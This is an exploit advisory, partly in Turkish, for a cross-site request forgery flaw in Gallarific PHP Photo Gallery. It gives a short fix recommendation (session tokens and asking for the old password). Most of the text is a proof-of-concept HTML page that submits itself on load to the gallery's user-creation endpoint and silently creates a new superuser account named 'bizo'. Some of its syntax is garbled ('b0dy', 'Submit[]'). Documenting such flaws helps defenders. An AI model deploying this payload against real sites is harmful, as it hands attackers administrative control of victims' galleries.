< ------------------- header data start ------------------- >

#############################################################

# Application Name : Gallarific PHP Photo Gallery

# Vulnerable Type : XSRF

# Infection : Uzaktan otomatik olarak admin pass change edilebilir.

# Bug Fix Advice : Form’a Oturum Key’i (Session Token) eklenmeli, eski sifre sorulmalidir.

# author : Bug Researchers

#############################################################

< ------------------- header data end of ------------------- >

< -- bug code start -- >

<b0dy onLoad=Submit();>
<script>function Submit[]{document.BizaRRo.submit();}</script>

<Form Action=http://www.site.com/[PATCH]/gadmin/users.php?task=savenew method=post name=BizaRRo>
<input type=hidden name=username id=username class=if value=bizo >
<input type=hidden name=email id=email class=if value=[email protected] >
<input type=hidden name=password id=password class=if value=bizo >
<select name=role id=role class=sb><option value=’superuser’>
<input type=hidden name=firstname id=firstname class=if value=bizo >
<input type=hidden name=lastname id=lastname class=if value=bizo >
<input type=hidden name=website id=website class=if value=http://>

<input type=submit value=create name=B1>



< -- bug code end of -- >